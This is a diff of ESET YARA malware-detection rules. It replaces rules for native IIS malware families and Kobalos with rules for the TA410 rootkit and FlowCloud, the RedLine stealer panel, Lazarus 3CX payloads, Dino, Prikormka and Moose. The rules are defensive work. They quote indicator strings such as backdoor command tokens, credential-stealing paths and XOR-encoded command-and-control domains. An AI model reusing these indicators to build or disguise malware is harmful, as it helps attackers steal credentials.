-		description = "Kobalos SSH credential stealer seen in OpenSSH client"
-		author = "Marc-Etienne M.Léveillé"
-		id = "b1fc5163-de48-57fc-8ae7-1f2be6c64d8a"
-		date = "2020-11-02"
-		modified = "2021-02-01"
+		description = "Strings found in TA410's Rootkit"
+		author = "ESET Research"
+		id = "a6a97721-571e-5414-9b00-5789d7bcd078"
+		date = "2021-10-12"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/kobalos/kobalos.yar#L58-L73"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L671-L697"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "be238f5c2cc976a5638584a8c0fc580f2076735aadfe374e8d4162ba723bce10"
+		logic_hash = "1d3ad63508c5e4bca32b9a44b738cb4a7384ccfa5704ce329260adb342ea4e60"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		license = "BSD 2-Clause"
 		version = "1"
 
 	strings:
-		$ = "user: %.128s host: %.128s port %05d user: %.128s password: %.128s"
+		$driver1 = "\\Driver\\kbdclass" wide
+		$driver2 = "\\Driver\\mouclass" wide
+		$device1 = "\\Device\\KeyboardClass0" wide
+		$device2 = "\\Device\\PointerClass0" wide
+		$driver3 = "\\Driver\\tcpip" wide
+		$device3 = "\\Device\\tcp" wide
+		$driver4 = "\\Driver\\nsiproxy" wide
+		$device4 = "\\Device\\Nsi" wide
+		$reg1 = "\\Registry\\Machine\\SYSTEM\\Setup\\AllowStart\\ceipCommon" wide
+		$reg2 = "RHH%d" wide
+		$reg3 = "RHP%d" wide
+		$s1 = "\\SystemRoot\\System32\\drivers\\hidmouse.sys" wide
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and all of ( $s1 , $reg* ) and ( all of ( $driver* ) or all of ( $device* ) )
 }
-rule ESET_IIS_Group02
+
+rule ESET_Apt_Windows_TA410_Flowcloud_V5_Resources : FILE
 {
 	meta:
-		description = "Detects Group 2 native IIS malware family"
+		description = "Matches sequence of PE resource IDs found in TA410 FlowCloud version 5.0.2"
 		author = "ESET Research"
-		id = "945e3748-1072-55f3-abaa-903dfc250294"
-		date = "2021-08-04"
-		modified = "2021-08-04"
+		id = "05a233f0-a823-5154-a47d-cede722d4710"
+		date = "2021-10-12"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L134-L155"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L699-L720"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "3fa2b8fed3c580f446b55412a920a5cfed2317b06aa93d059e9f89fdbec8f683"
+		logic_hash = "58f75dda53c6d4b3d88f464c452d855ac6dc88add5f4fba2641f52e7a1ae00ed"
 		score = 75
-		quality = 76
-		tags = ""
+		quality = 80
+		tags = "FILE"
 		license = "BSD 2-Clause"
 		version = "1"
 
-	strings:
-		$s1 = "HttpModule.pdb" ascii wide
-		$s2 = "([\\w+%]+)=([^&]*)"
-		$s3 = "([\\w+%]+)=([^!]*)"
-		$s4 = "cmd.exe"
-		$s5 = "C:\\Users\\Iso\\Documents\\Visual Studio 2013\\Projects\\IIS 5\\x64\\Release\\Vi.pdb" ascii wide
-		$s6 = "AVRSAFunction"
-
 	condition:
-		ESET_IIS_Native_Module_PRIVATE and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and pe.number_of_resources >= 13 and for 12 resource in pe.resources : ( resource.type == 10 and resource.language == 1033 and ( resource.name_string == "1\x000\x000\x00" or resource.name_string == "1\x000\x000\x000\x00" or resource.name_string == "1\x000\x000\x000\x000\x00" or resource.name_string == "1\x000\x000\x001\x00" or resource.name_string == "1\x000\x001\x00" or resource.name_string == "1\x000\x002\x00" or resource.name_string == "1\x000\x003\x00" or resource.name_string == "1\x000\x004\x00" or resource.name_string == "1\x000\x005\x00" or resource.name_string == "1\x000\x006\x00" or resource.name_string == "1\x000\x007\x00" or resource.name_string == "1\x000\x008\x00" or resource.name_string == "1\x000\x009\x00" or resource.name_string == "1\x001\x000\x00" or resource.name_string == "2\x000\x000\x000\x00" or resource.name_string == "2\x000\x000\x001\x00" ) )
 }
-rule ESET_IIS_Group03
+
+rule ESET_Apt_Windows_TA410_Flowcloud_V4_Resources : FILE
 {
 	meta:
-		description = "Detects Group 3 native IIS malware family"
+		description = "Matches sequence of PE resource IDs found in TA410 FlowCloud version 4.1.3"
 		author = "ESET Research"
-		id = "9caf9b3e-611e-5e0e-a7ee-9e7515679022"
-		date = "2021-08-04"
-		modified = "2021-08-04"
+		id = "57b98823-439f-5a2c-a8cb-ac5e98953b06"
+		date = "2021-10-12"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L157-L176"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L722-L741"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "d811c2ac610780bf968e86e8fd302cffc9434902e547399d06fdeb30d1719f51"
+		logic_hash = "7b475cfddb5f995f7e8e3293b8e6ae59a9e36143998bc444499b5dce467f8e9d"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		license = "BSD 2-Clause"
 		version = "1"
 
-	strings:
-		$s1 = "IIS-Backdoor.dll"
-		$s2 = "CryptStringToBinaryA"
-		$s3 = "CreateProcessA"
-		$s4 = "X-Cookie"
-
 	condition:
-		ESET_IIS_Native_Module_PRIVATE and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and pe.number_of_resources >= 6 and for 5 resource in pe.resources : ( resource.type == 10 and resource.language == 1033 and ( resource.name_string == "1\x000\x000\x000\x000\x00" or resource.name_string == "1\x000\x000\x000\x001\x00" or resource.name_string == "1\x000\x000\x000\x002\x00" or resource.name_string == "1\x000\x000\x000\x003\x00" or resource.name_string == "1\x000\x000\x000\x004\x00" or resource.name_string == "1\x000\x000\x000\x005\x00" or resource.name_string == "1\x000\x001\x000\x000\x00" ) )
 }
-rule ESET_IIS_Group04_Rgdoor
+rule ESET_Cw_Windows_Redline_Panel_Tab_Headers : FILE
 {
 	meta:
-		description = "Detects Group 4 native IIS malware family (RGDoor)"
+		description = "Matches view headers in Redline Panel"
 		author = "ESET Research"
-		id = "64a0e664-a4d9-555b-a11b-5f7d9d0678b1"
-		date = "2021-08-04"
-		modified = "2021-08-04"
+		id = "44a95845-b0a3-59c1-8188-86d415eff0bf"
+		date = "2022-10-11"
+		modified = "2024-11-12"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L178-L199"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/redline/redline.yar#L32-L55"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "be615dc0cc8bf0fd52cc5a88a3759c1cb1cd18703de74d16f5cce3eabccf91c6"
+		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
+		logic_hash = "3198aa9df2814a5f1d5568c6eed5f3189b2f72b3928cc97645f9bf57eebab9ac"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		license = "BSD 2-Clause"
-		version = "1"
+		version = 2
 
 	strings:
-		$i1 = "RGSESSIONID="
-		$s2 = "upload$"
-		$s3 = "download$"
-		$s4 = "cmd$"
-		$s5 = "cmd.exe"
+		$ = "RedLine | Log In"
+		$ = "RedLine | Autofilles Viewer"
+		$ = "RedLine | Choose Browser"
+		$ = "RedLine | Cookie Viewer"
+		$ = "RedLine | Credit Card Viewer"
+		$ = "RedLine | Files Viewer"
+		$ = "RedLine | Log saver"
+		$ = "RedLine | System Info Viewer"
 
 	condition:
-		ESET_IIS_Native_Module_PRIVATE and ( $i1 or all of ( $s* ) )
+		uint16( 0 ) == 0x5A4D and 6 of them
 }
-rule ESET_IIS_Group05_Iistealer
+rule ESET_Cw_Windows_Redline_Panel_Distinctive_Strings : FILE
 {
 	meta:
-		description = "Detects Group 5 native IIS malware family (IIStealer)"
+		description = "Matches rare strings found in Redline panel"
 		author = "ESET Research"
-		id = "598ec6b2-0349-5da7-acad-72ef2468b927"
-		date = "2021-08-04"
-		modified = "2021-08-04"
+		id = "d40ccb6b-e777-5c05-b97c-ead910047649"
+		date = "2022-10-11"
+		modified = "2024-11-12"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L201-L232"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/redline/redline.yar#L57-L77"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "5dff445121fda59df805d6fcb5db3f8f8e52a6e63e2da2a6875f8c9ad9cafc72"
+		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
+		logic_hash = "7ff0239426c4c3b46a269fad71232295c038c09f276cdc3c7f1142c830260a6d"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		license = "BSD 2-Clause"
-		version = "1"
+		version = 2
 
 	strings:
-		$s1 = "tojLrGzFMbcDTKcH" ascii wide
-		$s2 = "4vUOj3IutgtrpVwh" ascii wide
-		$s3 = "SoUnRCxgREXMu9bM" ascii wide
-		$s4 = "9Zr1Z78OkgaXj1Xr" ascii wide
-		$s5 = "cache.txt" ascii wide
-		$s6 = "/checkout/checkout.aspx" ascii wide
-		$s7 = "/checkout/Payment.aspx" ascii wide
-		$s8 = "/privacy.aspx"
-		$s9 = "X-IIS-Data"
-		$s10 = "POST"
-		$s11 = {C7 ?? CF 2F 00 63 00 C7 ?? D3 68 00 65 00 C7 ?? D7 63 00 6B 00 C7 ?? DB 6F 00 75 00 C7 ?? DF 74 00 2F 00 C7 ?? E3 63 00 68 00 C7 ?? E7 65 00 63 00 C7 ?? EB 6B 00 6F 00 C7 ?? EF 75 00 74 00 C7 ?? F3 2E 00 61 00 C7 ?? F7 73 00 70 00 C7 ?? FB 78 00 00 00}
-		$s12 = {C7 ?? AF 2F 00 70 00 C7 ?? B3 72 00 69 00 C7 ?? B7 76 00 61 00 C7 ?? BB 63 00 79 00 C7 ?? BF 2E 00 61 00 C7 ?? C3 73 00 70 00 C7 ?? C7 78 00 00 00}
+		$env_var = "%DSK_23%"
+		$fn_name = "IsGratherThan"
+		$telegram0 = "Telegram: @REDLINESUPPORT"
+		$telegram1 = "https://t.me/REDLINESUPPORT"
 
 	condition:
-		ESET_IIS_Native_Module_PRIVATE and 3 of ( $s* )
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule ESET_IIS_Group06_ISN
+rule ESET_Cw_Windows_Redline_Panel_Prompts : FILE
 {
 	meta:
-		description = "Detects Group 6 native IIS malware family (ISN)"
+		description = "Matches prompt messages in Redline panel"
 		author = "ESET Research"
-		id = "1f68fc42-61a3-5a7d-9daa-31ae3b561837"
-		date = "2021-08-04"
-		modified = "2021-08-04"
+		id = "3481586b-ed4b-5a27-82a0-0bbb3eea279e"
+		date = "2022-10-11"
+		modified = "2024-11-12"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L234-L259"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/redline/redline.yar#L79-L113"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "2f59034a642a9b92fc88922433cd5923be02332159cba5e16d99d9523ed43205"
+		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
+		logic_hash = "0dfab05a9383ba13b3c610f1ab0c81e95804470002f27171ab39706f7723983a"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		license = "BSD 2-Clause"
-		version = "1"
+		version = 2
 
 	strings:
-		$s1 = "isn7 config reloaded"
-		$s2 = "isn7 config NOT reloaded, not found or empty"
-		$s3 = "isn7 log deleted"
-		$s4 = "isn7 log not deleted, ERROR 0x%X"
-		$s5 = "isn7 log NOT found"
-		$s6 = "isn_reloadconfig"
-		$s7 = "D:\\soft\\Programming\\C++\\projects\\isapi\\isn7"
-		$s8 = "get POST failed %d"
-		$s9 = "isn7.dll"
+		$ = "Choose directory to save log"
+		$ = "Select log to set comment"
+		$ = "Please enter an action to create new task"
+		$ = "Please enter a target to create new task"
+		$ = "Please enter a final point to create new task"
+		$ = "Please enter a correct action to create new task"
+		$ = "Please enter a correct final point to create new task"
+		$ = "Please enter an action to edit task"
+		$ = "Please enter a target to edit task"
+		$ = "Please enter a final point to edit task"
+		$ = "Please enter a correct action to edit task"
+		$ = "Please enter a correct final point to edit task"
+		$ = "Please enter a correct status to edit task"
+		$ = "Please, enter a domains"
+		$ = "Please, enter a valid server ip"
+		$ = "Choose a file to pump"
+		$ = "Enter a valid count of bytes"
+		$ = "Enter a valid count of bytes. Must be more then zero"
+		$ = "Disconnected. Reboot your panel"
 
 	condition:
-		ESET_IIS_Native_Module_PRIVATE and 3 of ( $s* )
+		uint16( 0 ) == 0x5A4D and 10 of them
 }
-rule ESET_IIS_Group07_Iispy
+rule ESET_Cw_Windows_Redline_Panel_Status_Message_Strings : FILE
 {
 	meta:
-		description = "Detects Group 7 native IIS malware family (IISpy)"
+		description = "Matches error/success messages in Redline panel"
 		author = "ESET Research"
-		id = "64ed0189-a0be-5592-b9c6-1622700a7ed7"
-		date = "2021-08-04"
-		modified = "2021-08-04"
+		id = "70bdff10-9c86-57e3-b839-e86173a44855"
+		date = "2022-10-11"
+		modified = "2024-11-12"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L261-L296"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/redline/redline.yar#L115-L142"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "ec5db5f36d06f9b0bdfe598fc72431da35afc1473dcc29f437a0f48ea9835a03"
+		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
+		logic_hash = "c60fabc81967b083be72ff564af744ab60441de5d563ea6d88d873c0a99bfbdd"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		license = "BSD 2-Clause"
-		version = "1"
+		version = 1
 
 	strings:
-		$s1 = "/credential/username"
-		$s2 = "/credential/password"
-		$s3 = "/computer/domain"
-		$s4 = "/computer/name"
-		$s5 = "/password"
-		$s6 = "/cmd"
-		$s7 = "%.8s%.8s=%.8s%.16s%.8s%.16s"
-		$s8 = "ImpersonateLoggedOnUser"
-		$s9 = "WNetAddConnection2W"
-		$t1 = "X-Forwarded-Proto"
-		$t2 = "Sec-Fetch-Mode"
-		$t3 = "Sec-Fetch-Site"
-		$t4 = "Cookie"
-		$t5 = {49 45 4E 44 AE 42 60 82}
-		$t6 = {89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52}
+		$ = "All Browsers are empty"
+		$ = "Client [{0}:{1}:{2}] completed task with {3} ID."
+		$ = "A List of logs cleared"
+		$ = "Browsers not found"
+		$ = "Browsers is empty"
+		$ = "Done. Check your build file"
+		$ = "You must to enable assembly info or certificate in settings"
+		$ = "Duplicate log from "
+		$ = "Password list is empty"
+		$ = "Cookie list is empty"
+		$ = "FTPs not found"
+		$ = "Files not found"
 
 	condition:
-		ESET_IIS_Native_Module_PRIVATE and 2 of ( $s* ) and any of ( $t* )
+		uint16( 0 ) == 0x5A4D and 8 of them
 }
-rule ESET_IIS_Group08
+rule ESET_Cw_Windows_Redline_Panel_Commands : FILE
 {
 	meta:
-		description = "Detects Group 8 native IIS malware family"
+		description = "Matches commands and functionalities in Redline panel"
 		author = "ESET Research"
-		id = "d0e9a5ec-b7f0-5d3f-93b4-d048503eb210"
-		date = "2021-08-04"
-		modified = "2021-08-04"
+		id = "b479dc47-53a0-5ead-a4c3-bcdfcaf82ef8"
+		date = "2022-10-11"
+		modified = "2024-11-12"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L298-L337"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/redline/redline.yar#L144-L172"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "d5826d454d25ecbbb5da464da974023a247517d873cf10dc0eafa91e185451da"
+		hash = "a154dfaedc237c047f419eb6884dab1ef4e2a17d"
+		logic_hash = "724516101264aa89259e847e4703d4eb993f330f82bd2df2433176b11d0c8974"
 		score = 75
-		quality = 53
-		tags = ""
+		quality = 55
+		tags = "FILE"
 		license = "BSD 2-Clause"
-		version = "1"
+		version = 2
 
 	strings:
-		$i1 = "FliterSecurity.dll"
-		$i2 = "IIS7NativeModule.dll"
-		$i3 = "Ver1.0."
-		$s1 = "Cmd"
-		$s2 = "Realy path : %s"
-		$s3 = "Logged On Users : %d"
-		$s4 = "Connect OK!"
-		$s5 = "You are fucked!"
-		$s6 = "Shit!Error"
-		$s7 = "Where is the God!!"
-		$s8 = "Shit!Download False!"
-		$s9 = "Good!Run OK!"
-		$s10 = "Shit!Run False!"
-		$s11 = "Good!Download OK!"
-		$s12 = "[%d]safedog"
-		$s13 = "ed81bfc09d069121"
-		$s14 = "a9478ef01967d190"
-		$s15 = "af964b7479e5aea2"
-		$s16 = "1f9e6526bea65b59"
-		$s17 = "2b9e9de34f782d31"
-		$s18 = "33cc5da72ac9d7bb"
-		$s19 = "b1d71f4c2596cd55"
-		$s20 = "101fb9d9e86d9e6c"
+		$cmd0 = "Download"
+		$cmd1 = "RunPE"
+		$cmd2 = "DownloadAndEx"
+		$cmd3 = "OpenLink"
+		$cmd4 = "Cmd"
+		$action0 = "GrabBrowsers"
+		$action1 = "GrabFiles"
+		$action2 = "GrabImClients"
+		$action3 = "AntiDuplicate"
+		$action4 = "grabBrowsers"
+		$action5 = "grabFiles"
+		$action6 = "grabImClients"
+		$action7 = "antiDuplicate"
 
 	condition:
-		ESET_IIS_Native_Module_PRIVATE and 1 of ( $i* ) and 3 of ( $s* )
+		uint16( 0 ) == 0x5A4D and all of ( $cmd* ) and 4 of ( $action* )
 }
-rule ESET_IIS_Group09
+
+rule ESET_Richheaders_Lazarus_Nukesped_Iconicpayloads_3CX_Q12023
 {
 	meta:
-		description = "Detects Group 9 native IIS malware family"
+		description = "Rich Headers-based rule covering the IconicLoader and IconicStealer from the 3CX supply chain incident, and also payloads from the cryptocurrency campaigns from 2022-12"
 		author = "ESET Research"
-		id = "69d176bc-73b1-5c4d-bb7e-463d26e8e6a9"
-		date = "2021-08-04"
-		modified = "2021-08-04"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L339-L387"
+		id = "5c815d14-8a3e-5c6a-9dc3-988e0f31c094"
+		date = "2023-03-31"
+		modified = "2023-04-19"
+		reference = "https://github.com/eset/malware-ioc"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/nukesped_lazarus/rich_headers_IconicPayloads_3CX.yar#L6-L23"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "5f89f9488221b8db8d493b3c23b7f5edd957c15511148eca890558886c128192"
+		hash = "3b88cda62cdd918b62ef5aa8c5a73a46f176d18b"
+		hash = "cad1120d91b812acafef7175f949dd1b09c6c21a"
+		hash = "5b03294b72c0caa5fb20e7817002c600645eb475"
+		hash = "7491bd61ed15298ce5ee5ffd01c8c82a2cdb40ec"
+		logic_hash = "f11a1db798bfcc534982bdf6afaae154b095b6a1e0896e75e2791c01e51a1c16"
 		score = 75
-		quality = 76
+		quality = 80
 		tags = ""
-		license = "BSD 2-Clause"
-		version = "1"
-
-	strings:
-		$i1 = "FliterSecurity.dll"
-		$i2 = {56565656565656565656565656565656}
-		$i3 = "app|hot|alp|svf|fkj|mry|poc|doc|20" xor
-		$i4 = "yisouspider|yisou|soso|sogou|m.sogou|sogo|sogou|so.com|baidu|bing|360" xor
-		$i5 = "baidu|m.baidu|soso|sogou|m.sogou|sogo|sogou|so.com|google|youdao" xor
-		$i6 = "118|abc|1go|evk" xor
-		$s1 = "AVCFuckHttpModuleFactory"
-		$s2 = "X-Forward"
-		$s3 = "fuck32.dat"
-		$s4 = "fuck64.dat"
-		$s5 = "&ipzz1="
-		$s6 = "&ipzz2="
-		$s7 = "&uuu="
-		$s8 = "http://20.3323sf.c" xor
-		$s9 = "http://bj.whtjz.c" xor
-		$s10 = "http://bj2.wzrpx.c" xor
-		$s11 = "http://cs.whtjz.c" xor
-		$s12 = "http://df.e652.c" xor
-		$s13 = "http://dfcp.yyphw.c" xor
-		$s14 = "http://es.csdsx.c" xor
-		$s15 = "http://hz.wzrpx.c" xor
-		$s16 = "http://id.3323sf.c" xor
-		$s17 = "http://qp.008php.c" xor
-		$s18 = "http://qp.nmnsw.c" xor
-		$s19 = "http://sc.300bt.c" xor
-		$s20 = "http://sc.wzrpx.c" xor
-		$s21 = "http://sf2223.c" xor
-		$s22 = "http://sx.cmdxb.c" xor
-		$s23 = "http://sz.ycfhx.c" xor
-		$s24 = "http://xpq.0660sf.c" xor
-		$s25 = "http://xsc.b1174.c" xor
 
 	condition:
-		ESET_IIS_Native_Module_PRIVATE and any of ( $i* ) and 3 of ( $s* )
+		pe.rich_signature.toolid( 259 , 30818 ) == 9 and pe.rich_signature.toolid ( 256 , 31329 ) == 1 and pe.rich_signature.toolid ( 261 , 30818 ) >= 30 and pe.rich_signature.toolid ( 261 , 30818 ) <= 38 and pe.rich_signature.toolid ( 261 , 29395 ) >= 134 and pe.rich_signature.toolid ( 261 , 29395 ) <= 164 and pe.rich_signature.toolid ( 257 , 29395 ) >= 6 and pe.rich_signature.toolid ( 257 , 29395 ) <= 14
 }
-rule ESET_IIS_Group10
+rule ESET_Dino
 {
 	meta:
-		description = "Detects Group 10 native IIS malware family"
-		author = "ESET Research"
-		id = "31368b38-9128-594d-888d-e97d3edc7a1f"
-		date = "2021-08-04"
-		modified = "2021-08-04"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "77d0a039-f60c-59ea-bad6-5b4b630007bb"
+		date = "2015-07-14"
+		modified = "2015-08-17"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L389-L423"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/animalfarm/animalfarm.yar#L73-L96"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "48701168d7da726222227ef757f1a4005a49c0bf300123319ce03db09445b3ef"
+		logic_hash = "898e527eb8b05050135dee7cbe974100710a1a3a6a5cb8eb03563ee1c0aca01f"
 		score = 75
 		quality = 80
 		tags = ""
-		license = "BSD 2-Clause"
-		version = "1"
+		Author = "Joan Calvet"
+		Description = "Dino backdoor"
+		Contact = "github@eset.com"
+		License = "BSD 2-Clause"
 
 	strings:
-		$s1 = "IIS7.dll"
-		$s2 = "<title>(.*?)title(.*?)>"
-		$s3 = "<meta(.*?)name(.*?)=(.*?)keywords(.*?)>"
-		$s4 = "<meta(.*?)name(.*?)=(.*?)description(.*?)>"
-		$s5 = "js.breakavs.co"
-		$s6 = "&#24494;&#20449;&#32676;&#45;&#36187;&#36710;&#80;&#75;&#49;&#48;&#32676;&#12304;&#36827;&#32676;&#24494;&#20449;&#102;&#117;&#110;&#53;&#55;&#54;&#52;&#52;&#12305;&#95;&#24184;&#36816;&#39134;&#33351;&#95;&#24184;&#36816;&#50;&#56;&#32676;"
-		$s7 = "&#21271;&#20140;&#36187;&#36710;&#24494;&#20449;&#32676;&#44;&#21271;&#20140;&#24494;&#20449;&#36187;&#36710;&#32676;&#44;&#21271;&#20140;&#36187;&#36710;&#24494;&#20449;&#32676;&#44;&#80;&#75;&#49;&#48;&#32676;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#24494;&#20449;&#32676;&#44;&#80;&#75;&#49;&#48;&#24494;&#20449;&#32676;&#44;&#36187;&#36710;&#24494;&#20449;&#32676;&#44;&#21271;&#20140;&#36187;&#36710;&#32676;&#44;"
-		$s8 = "&#21271;&#20140;&#36187;&#36710;&#24494;&#20449;&#32676;&#44;&#21271;&#20140;&#24494;&#20449;&#36187;&#36710;&#32676;&#12304;&#36827;&#32676;&#24494;&#20449;&#21495;&#102;&#117;&#110;&#53;&#55;&#54;&#52;&#52;&#12305;&#21271;&#20140;&#24494;&#20449;&#36187;&#36710;&#32676;&#44;&#21271;&#20140;&#24494;&#20449;&#36187;&#36710;"
-		$e1 = "Baiduspider"
-		$e2 = "Sosospider"
-		$e3 = "Sogou web spider"
-		$e4 = "360Spider"
-		$e5 = "YisouSpider"
-		$e6 = "sogou.com"
-		$e7 = "soso.com"
-		$e8 = "uc.cn"
-		$e9 = "baidu.com"
-		$e10 = "sm.cn"
+		$ = "PsmIsANiceM0du1eWith0SugarInsideA"
+		$ = "destroyPSM"
+		$ = "FM_PENDING_DOWN_%X"
+		$ = "%s was canceled after %d try (reached MaxTry parameter)"
+		$ = "you forgot value name"
+		$ = "wakeup successfully scheduled in %d minutes"
+		$ = "BD started at %s"
+		$ = "decyphering failed on bd"
 
 	condition:
-		ESET_IIS_Native_Module_PRIVATE and 2 of ( $e* ) and 3 of ( $s* )
+		any of them
 }
-rule ESET_IIS_Group11
+rule ESET_Prikormka
 {
 	meta:
-		description = "Detects Group 11 native IIS malware family"
-		author = "ESET Research"
-		id = "e9dac67a-1675-5198-ad26-d555696844f9"
-		date = "2021-08-04"
-		modified = "2021-08-04"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "6073aa34-d385-5ae8-b97d-9b3d61015aae"
+		date = "2016-05-10"
+		modified = "2019-08-28"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L425-L455"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/groundbait/prikormka.yar#L130-L141"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "a67b6b49b5fc2c7f260c06201c59478f5472de63091c510af82d526c410abb0c"
+		logic_hash = "f64195e680fbaefedba248aa15b37ed30ba72f42958cc48963a140165e951bff"
 		score = 75
 		quality = 80
 		tags = ""
-		license = "BSD 2-Clause"
-		version = "1"
-
-	strings:
-		$s1 = "DnsQuery_A"
-		$s2 = "&reurl="
-		$s3 = "&jump=1"
-		$s4 = "JVVRaeof"
-		$s5 = "ncpmg::0"
-		$s6 = "zkpzz0cnnuqwnw0eqo"
-		$s7 = "jvvr<11yyy0cnnuqwnw0eqo130rjrAeofqwv?"
+		Author = "Anton Cherepanov"
+		Description = "Operation Groundbait"
+		Contact = "threatintel@eset.com"
+		License = "BSD 2-Clause"
 
 	condition:
-		ESET_IIS_Native_Module_PRIVATE and 3 of ( $s* )
+		ESET_Prikormkadropper_PRIVATE or ESET_Prikormkamodule_PRIVATE or ESET_Prikormkaearlyversion_PRIVATE
 }
-rule ESET_IIS_Group12
+rule ESET_Moose_1
 {
 	meta:
-		description = "Detects Group 12 native IIS malware family"
-		author = "ESET Research"
-		id = "7278f2df-d18a-5d95-9c21-37906629a7f0"
-		date = "2021-08-04"
-		modified = "2021-08-04"
+		description = "No description has been set in the source file - ESET"
+		author = "ESET TI"
+		id = "4d228de6-ddbf-57c0-a330-5840c4d40dfc"
+		date = "2015-04-21"
+		modified = "2016-11-01"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L457-L495"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/moose/linux-moose.yar#L41-L76"
